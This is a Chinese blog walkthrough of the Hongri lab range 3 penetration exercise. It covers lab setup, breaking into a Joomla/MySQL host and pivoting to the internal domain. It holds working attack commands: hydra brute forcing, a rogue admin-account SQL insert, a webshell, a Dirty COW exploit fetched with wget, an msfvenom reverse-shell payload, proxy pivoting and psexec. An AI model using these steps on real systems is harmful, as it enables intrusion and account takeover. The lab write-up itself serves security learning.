<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="红日靶场 3, marin的小窝">
    <meta name="description" content="红日靶场 3靶场搭建创建一个 VMnet2​，网段是 192.168.93.0/24​，因为默认配置就是这个，修改成其他的 VMnet 还需要修改


这里加载后记得打快照，这个靶机都是挂起状态的，不打快照重启后可能就打不开服务
这里打开后">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>红日靶场 3 | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20230618_234051.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">红日靶场 3</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">内网渗透</span>
                            </a>
                        
                            <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                                <span class="chip bg-color">红日靶场系列</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                渗透
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-03-23
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="红日靶场-3"><a href="#红日靶场-3" class="headerlink" title="红日靶场 3"></a>红日靶场 3</h1><h2 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>靶场搭建</h2><p>创建一个 <code>VMnet2</code>​，网段是 <code>192.168.93.0/24</code>​，因为默认配置就是这个，修改成其他的 <code>VMnet</code> 还需要修改</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260315220032-0d6b3v9.png" alt="image"></p>
<blockquote>
<p>这里加载后记得打快照，这个靶机都是挂起状态的，不打快照重启后可能就打不开服务</p>
<p>这里打开后一堆毛病，主要启动服务的 web-ubantu 打开就报错，会导致访问页面就 502 了，最后 VM 版本调回 16.2 就没事了</p>
</blockquote>
<p>web-centos：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317095605-3eetskl.png" alt="image"></p>
<p>这里捣鼓了半天，后来发现这个靶机是热加载的，不需要关机更换网卡设置，开机就能修改</p>
<p>进去要重启网卡，这里还有个问题，重启网卡一直失败</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">service network restart</code></pre>

<p>需要在设置中修改一下才能成功</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317100032-4si1znc.png" alt="image"></p>
<p>要将这两个都勾选上</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317100106-tza4xab.png" alt="image"></p>
<p>PC：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260316213622-7guedsb.png" alt="image"></p>
<p>web-ubantu：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260316213622-7guedsb.png" alt="image"></p>
<p>win 2008：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260316213622-7guedsb.png" alt="image"></p>
<p>server 2012：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260316213622-7guedsb.png" alt="image"></p>
<h2 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h2><p>这里模拟实战环境，是不知道这里 IP 地址是什么，所以扫描整个 C 段</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">nmap -sn 192.168.154.0&#x2F;24</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317144222-v5laqnj.png" alt="image"></p>
<p>确定目标 IP 就是 <code>192.168.154.128</code>，进行端口扫描</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">nmap -sS -sV -p- 192.168.154.128</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317144341-xs126wc.png" alt="image"></p>
<p>这里看到有 ssh 和 mysql 服务，尝试了一下弱密码，成功爆出来一个弱密码</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">hydra -C mysql-betterdefaultpasslist.txt mysql:&#x2F;&#x2F;192.168.154.128</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317144449-5h59az5.png" alt="image"></p>
<h3 id="mysql-渗透（失败）"><a href="#mysql-渗透（失败）" class="headerlink" title="mysql 渗透（失败）"></a>mysql 渗透（失败）</h3><p>直接连接上去，就是 root 权限，而且 IP 像内网的 IP</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">mysql -u root -h 192.168.154.128 -p123</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317152548-i4bq24a.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317152555-n2tlu1h.png" alt="image"></p>
<p>看看能不能写日志 shell，权限和配置够了，打开一下日志功能</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317152819-8bzedkm.png" alt="image"></p>
<p>但是这里要写日志不知道 web 路径，先放一放</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317152913-iu9g02a.png" alt="image"></p>
<p>这里本来尝试随便写一个文件的，但是好像配置了什么导致不成功，这个方法应该是被 ban 了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317154819-inip6km.png" alt="image"></p>
<p>‍</p>
<h3 id="网站渗透"><a href="#网站渗透" class="headerlink" title="网站渗透"></a>网站渗透</h3><p>是一个 php 环境，cms 是 <code>Joomla</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317152957-akf3vqk.png" alt="image"></p>
<p>扫目录发现挺多东西的</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">[14:43:31] 403 -  280B  - &#x2F;.configuration.php.swp
[14:43:32] 403 -  280B  - &#x2F;.ht_wsr.txt
[14:43:32] 403 -  280B  - &#x2F;.htaccess.bak1
[14:43:32] 403 -  280B  - &#x2F;.htaccess.orig
[14:43:32] 403 -  280B  - &#x2F;.htaccess.sample
[14:43:32] 403 -  280B  - &#x2F;.htaccess_extra
[14:43:32] 403 -  280B  - &#x2F;.htaccess_sc
[14:43:32] 403 -  280B  - &#x2F;.htaccessOLD2
[14:43:32] 403 -  280B  - &#x2F;.htaccess_orig
[14:43:32] 403 -  280B  - &#x2F;.htm
[14:43:32] 403 -  280B  - &#x2F;.html
[14:43:32] 403 -  280B  - &#x2F;.htaccess.save
[14:43:32] 403 -  280B  - &#x2F;.htaccessBAK
[14:43:32] 403 -  280B  - &#x2F;.htpasswd_test
[14:43:32] 403 -  280B  - &#x2F;.htaccessOLD
[14:43:32] 403 -  280B  - &#x2F;.httr-oauth
[14:43:32] 403 -  280B  - &#x2F;.htpasswds
[14:43:33] 403 -  280B  - &#x2F;.php
[14:43:35] 200 -    0B  - &#x2F;2.php
[14:43:36] 200 -   24KB - &#x2F;1.php
[14:43:42] 301 -  326B  - &#x2F;administrator  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;administrator&#x2F;
[14:43:42] 200 -   31B  - &#x2F;administrator&#x2F;cache&#x2F;
[14:43:42] 301 -  331B  - &#x2F;administrator&#x2F;logs  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;administrator&#x2F;logs&#x2F;
[14:43:42] 200 -  526B  - &#x2F;administrator&#x2F;includes&#x2F;
[14:43:42] 200 -   31B  - &#x2F;administrator&#x2F;logs&#x2F;
[14:43:44] 200 -    2KB - &#x2F;administrator&#x2F;index.php
[14:43:44] 200 -    2KB - &#x2F;administrator&#x2F;
[14:43:46] 301 -  316B  - &#x2F;bin  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;bin&#x2F;
[14:43:46] 200 -   31B  - &#x2F;bin&#x2F;
[14:43:47] 301 -  318B  - &#x2F;cache  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;cache&#x2F;
[14:43:47] 200 -   31B  - &#x2F;cache&#x2F;
[14:43:48] 200 -   31B  - &#x2F;cli&#x2F;
[14:43:48] 200 -   31B  - &#x2F;components&#x2F;
[14:43:48] 301 -  323B  - &#x2F;components  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;components&#x2F;
[14:43:49] 200 -    2KB - &#x2F;configuration.php~
[14:43:49] 200 -    0B  - &#x2F;configuration.php
[14:43:55] 200 -    1KB - &#x2F;htaccess.txt
[14:43:56] 200 -   31B  - &#x2F;images&#x2F;
[14:43:56] 301 -  319B  - &#x2F;images  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;images&#x2F;
[14:43:56] 200 -   31B  - &#x2F;includes&#x2F;
[14:43:56] 301 -  321B  - &#x2F;includes  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;includes&#x2F;
[14:43:58] 200 -    4KB - &#x2F;index.php
[14:43:58] 200 -    3KB - &#x2F;index.php&#x2F;login&#x2F;
[14:43:58] 301 -  321B  - &#x2F;language  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;language&#x2F;
[14:43:59] 200 -   31B  - &#x2F;layouts&#x2F;
[14:43:59] 301 -  322B  - &#x2F;libraries  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;libraries&#x2F;
[14:43:59] 200 -   31B  - &#x2F;libraries&#x2F;
[14:43:59] 200 -    7KB - &#x2F;LICENSE.txt
[14:44:01] 301 -  318B  - &#x2F;media  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;media&#x2F;
[14:44:01] 200 -   31B  - &#x2F;media&#x2F;
[14:44:02] 301 -  320B  - &#x2F;modules  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;modules&#x2F;
[14:44:02] 200 -   31B  - &#x2F;modules&#x2F;
[14:44:07] 301 -  320B  - &#x2F;plugins  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;plugins&#x2F;
[14:44:07] 200 -   31B  - &#x2F;plugins&#x2F;
[14:44:09] 200 -    2KB - &#x2F;README.txt
[14:44:10] 200 -  392B  - &#x2F;robots.txt
[14:44:11] 403 -  280B  - &#x2F;server-status
[14:44:11] 403 -  280B  - &#x2F;server-status&#x2F;
[14:44:15] 301 -  322B  - &#x2F;templates  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;templates&#x2F;
[14:44:15] 200 -   31B  - &#x2F;templates&#x2F;index.html
[14:44:15] 200 -    0B  - &#x2F;templates&#x2F;protostar&#x2F;
[14:44:15] 200 -    0B  - &#x2F;templates&#x2F;beez3&#x2F;
[14:44:15] 200 -   31B  - &#x2F;templates&#x2F;
[14:44:15] 200 -    0B  - &#x2F;templates&#x2F;system&#x2F;
[14:44:16] 301 -  316B  - &#x2F;tmp  -&gt;  http:&#x2F;&#x2F;192.168.154.128&#x2F;tmp&#x2F;
[14:44:16] 200 -   31B  - &#x2F;tmp&#x2F;
[14:44:19] 200 -  628B  - &#x2F;web.config.txt</code></pre>

<blockquote>
<p>这里有个 2.php 直接有 phpinfo 了，不知道是没删干净还是啥，先不用</p>
</blockquote>
<p>这里还扫到了一个 <code>configuration.php~</code>，这个应该就是 Joomla 的配置文件，这里还有一个用户的账号密码，但是登录不到后台</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317154128-gz89ka4.png" alt="image"></p>
<p>这里可以看到有一个 log_path，刚好可以给 mysql 利用</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317154337-uv73q7x.png" alt="image"></p>
<p>这里还有一个后台，密码可以到 mysql 中去读</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317154915-aved7o5.png" alt="image"></p>
<p>这里可以看到这个 <code>am2zu_users</code> 表中存储着用户信息，但是密码被加密了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317155242-gu4w0th.png" alt="image"></p>
<p>这里翻了一下，发现官方有些如何添加超级管理员，那还说啥了，直接拿来用</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317155916-54ylxgo.png" alt="image"></p>
<p>但这里要修改一下表名，这里修改的密码是 <code>secret</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">INSERT INTO &#96;am2zu_users&#96;
   (&#96;name&#96;, &#96;username&#96;, &#96;password&#96;, &#96;params&#96;, &#96;registerDate&#96;, &#96;lastvisitDate&#96;, &#96;lastResetTime&#96;)
VALUES (&#39;Administrator2&#39;, &#39;admin2&#39;,
    &#39;d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199&#39;, &#39;&#39;, NOW(), NOW(), NOW());
INSERT INTO &#96;am2zu_user_usergroup_map&#96; (&#96;user_id&#96;,&#96;group_id&#96;)
VALUES (LAST_INSERT_ID(),&#39;8&#39;);</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317155956-ifn2vmf.png" alt="image"></p>
<p>成功登录后台</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317160033-j2co6x1.png" alt="image"></p>
<p>这里可以通过修改后台主题的文件来上 shell</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317160959-htahsl2.png" alt="image"></p>
<p>这里修改 <code>error.php</code> 文件</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317161219-8d2u97z.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317161305-xl9lodg.png" alt="image"></p>
<p>没有禁用 eval，试试马</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317161327-k3nk3h5.png" alt="image"></p>
<p>可以执行命令，但是没有 <code>system</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317161726-su1l7ss.png" alt="image"></p>
<p>不管，直接上蚁剑，看看能不能上传文件，能上传文件就 win 了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317161844-utwtpmt.png" alt="image"></p>
<p>蚁剑有一个插件，可以用来尝试绕过</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317162324-etsipj3.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317162411-mzkb83p.png" alt="image"></p>
<h2 id="C2-上线（失败）"><a href="#C2-上线（失败）" class="headerlink" title="C2 上线（失败）"></a>C2 上线（失败）</h2><p>这里目标机器是 linux，用 cs 需要一个插件</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317165013-xmgngda.png" alt="image"></p>
<p>上传这个马</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317165025-7pbimvv.png" alt="image"></p>
<p>但是这里又是连接不上，不知道为什么，只能先换一条路</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317165542-3cekl3l.png" alt="image"></p>
<p>这里看到 tmp 目录下有一个 mysql 目录，进去看到一个文件</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317165948-gkcj2tk.png" alt="image"></p>
<h2 id="ssh"><a href="#ssh" class="headerlink" title="ssh"></a>ssh</h2><p>尝试用来 ssh 登录，这里直接连会报错，因为目标版本太低了，需要加个配置，成功获取到一个普通用户权限</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">ssh -o HostKeyAlgorithms&#x3D;+ssh-rsa -o PubkeyAcceptedKeyTypes&#x3D;+ssh-rsa wwwuser@192.168.154.128</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317170339-41zv6b7.png" alt="image"></p>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>先尝试 suid 提权</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">find &#x2F; -perm -u&#x3D;s -type f 2&gt;&#x2F;dev&#x2F;null</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317170709-0mmwz8v.png" alt="image"></p>
<p>都失败哩，甚至还有报告（</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317173433-c6yr71h.png" alt="image"></p>
<p>这里查到一种脏牛提权，版本应该是匹配上了</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">uname -a
cat &#x2F;etc&#x2F;redhat-release</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317174204-urlf5yh.png" alt="image"></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">searchsploit dirty cow</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317174615-rxh2m82.png" alt="image"></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">searchsploit -m 40839.c</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317174715-6hl9vlf.png" alt="image"></p>
<p>下载下来后起一个 http 服务，让服务器下载一个，其实直接文件上传上去也可以</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">wget http:&#x2F;&#x2F;192.168.154.130:8088&#x2F;40839.c -O dirty.c</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317174846-vy0so1v.png" alt="image"></p>
<p>这里要先编译一下，然后执行生成的文件，然后加上密码就行</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">gcc --version
gcc -pthread dirty.c -o dirty -lcrypt</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317175445-wd9v9tf.png" alt="image"></p>
<p>提权成功</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317175550-6fpa02s.png" alt="image"></p>
<p>使用 msf 上线，cs 好像搞不定</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">msfvenom -p linux&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.154.130 LPORT&#x3D;4444 -f elf &gt; shell.elf</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317180853-ice3krd.png" alt="image"></p>
<p>启动一下服务</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">msfconsole -q
msf6 &gt; use exploit&#x2F;multi&#x2F;handler
msf6 &gt; set payload linux&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp
msf6 &gt; set LHOST 192.168.154.130
msf6 &gt; set LPORT 4444
msf6 &gt; run</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317181514-fd7av84.png" alt="image"></p>
<p>然后将这个文件传过去，成功上线</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317182645-l1utmk2.png" alt="image"></p>
<p>然后可以使用命令看看基础信息</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">sysinfo
ifconfig</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317185911-k913jk3.png" alt="image"></p>
<h2 id="横向渗透"><a href="#横向渗透" class="headerlink" title="横向渗透"></a>横向渗透</h2><p>将内网网段添加到路由表中</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">run autoroute -s 192.168.93.0&#x2F;24
run autoroute -p</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317190040-mz9vq1a.png" alt="image"></p>
<p>然后要配置全局代理</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">background
use auxiliary&#x2F;server&#x2F;socks_proxy
set srvport 1080
set version 4a
run</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317190526-f7t6cad.png" alt="image"></p>
<p>然后修改 kali 的配置，在最后一行加上 <code>socks4 127.0.0.1 1080</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">sudo nano &#x2F;etc&#x2F;proxychains4.conf</code></pre>

<p>然后就可以利用这个代理去扫描内网了</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">proxychains4 nmap -Pn -sT -p 445,135,80 --open 192.168.93.0&#x2F;24</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317192922-p6oiu9u.png" alt="image"></p>
<p>这里可以确定有 5 个目标，100 就是拿到权限的这个</p>
<p><code>192.168.93.10</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317194220-hmpkrlz.png" alt="image"></p>
<p><code>192.168.93.20</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317194518-jzea53q.png" alt="image"></p>
<p><code>192.168.93.30</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317194936-m62nk15.png" alt="image"></p>
<p><code>192.168.93.120</code> 这个是服务器的 IP，所以这个服务是搭建在内网的，只是用外网的这个转发出去，所以这个服务器的权限也相当于拿到了，只是权限不够高</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317195151-6lgp4pv.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317195340-fzmup43.png" alt="image"></p>
<p>这里像尝试永恒之蓝，都失败了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317200141-xow52i1.png" alt="image"></p>
<p>这里没辙了，只能尝试爆破密码了，这个密码我找了一圈发现我的字典中都没有（，又不想爆太大，就直接添加到我的字典中了</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">proxychains4 hydra -l administrator -P 500-worst-passwords.txt smb:&#x2F;&#x2F;192.168.93.20</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317201910-msmc79g.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317202025-jd6f2du.png" alt="image"></p>
<p>然后就可以利用 msf 的 psexec 模块来获取权限</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">use exploit&#x2F;windows&#x2F;smb&#x2F;psexec

set RHOSTS 192.168.93.20
set SMBUser administrator
set SMBPass 123456

set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp
set LPORT 4444

run</code></pre>

<p>这里甚至是 system 用户</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317202428-z5h8s2s.png" alt="image"></p>
<p>信息收集</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317202538-iz8h8xr.png" alt="image"></p>
<p>域控机就是 <code>WIN-8GA56TNV3MV</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260317202755-wp2xqu5.png" alt="image"></p>
<p>获取到域控机的 IP 就是 <code>192.168.93.10</code>，剩下两台几次其实都拿下了</p>
